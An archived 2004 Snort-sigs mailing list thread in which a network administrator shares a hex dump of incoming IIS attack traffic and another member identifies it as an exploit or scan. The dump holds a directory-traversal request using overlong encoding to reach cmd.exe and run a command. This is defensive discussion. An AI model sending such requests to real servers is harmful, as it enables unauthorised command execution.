[Snort-sigs] Weird new CMD.EXE payload...

Larry Pingree lpingree at ...146...
Wed Jun 16 08:08:08 EDT 2004


How can I unsubscribe from this list?


LP
 
Best Regards,
 
Larry
 
Larry Pingree
Partner Engineering
Juniper Networks, Inc.
408-543-2190
 
"Visionary people, are visionary, partly because of the great many
things they never get to see." - Larry Pingree
Juniper Networks Logo

-----Original Message-----
From: snort-sigs-admin at lists.sourceforge.net
[mailto:snort-sigs-admin at lists.sourceforge.net] On Behalf Of Roach4
Sent: Wednesday, June 16, 2004 7:54 AM
To: K. Jared Kalisz
Cc: snort-sigs at lists.sourceforge.net
Subject: Re: [Snort-sigs] Weird new CMD.EXE payload...

Hi Jared,

This simply looks like an IIS exploit... either it's a scan or a
specific
vulnerable string against your web server.

Good luck,

David



>
> I'm seeing a lot of this this morning. Weird patterns too.. One
attempt
> from
> each source address They keep pouring in ...
>
> Any thoughts??
>
> 000 : 67 65 74 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   get
/scripts/..%
> 010 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25
c0%af..%c0%af..%
> 020 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25
c0%af..%c0%af..%
> 030 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25
c0%af..%c0%af..%
> 040 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2F 77 69
c0%af..%c0%af/wi
> 050 : 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64
nnt/system32/cmd
> 060 : 2E 65 78 65 3F 2F 63 25 32 30 64 69 72 0D 0A
.exe?/c%20dir..
>
>
> Jared Kalisz
> Prodika
> 1245 South Main Street, 2nd Floor
> Grapevine, Texas
> Tel 817.488.3080
> Fax 817.488.7060
>
>
>
>
>
> -------------------------------------------------------
> This SF.Net email is sponsored by The 2004 JavaOne(SM) Conference
> Learn from the experts at JavaOne(SM), Sun's Worldwide Java Developer
> Conference, June 28 - July 1 at the Moscone Center in San Francisco,
CA
> REGISTER AND SAVE! http://java.sun.com/javaone/sf Priority Code
NWMGYKND
> _______________________________________________
> Snort-sigs mailing list
> Snort-sigs at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/snort-sigs
>



-------------------------------------------------------
This SF.Net email is sponsored by The 2004 JavaOne(SM) Conference
Learn from the experts at JavaOne(SM), Sun's Worldwide Java Developer
Conference, June 28 - July 1 at the Moscone Center in San Francisco, CA
REGISTER AND SAVE! http://java.sun.com/javaone/sf Priority Code NWMGYKND
_______________________________________________
Snort-sigs mailing list
Snort-sigs at lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs




More information about the Snort-sigs mailing list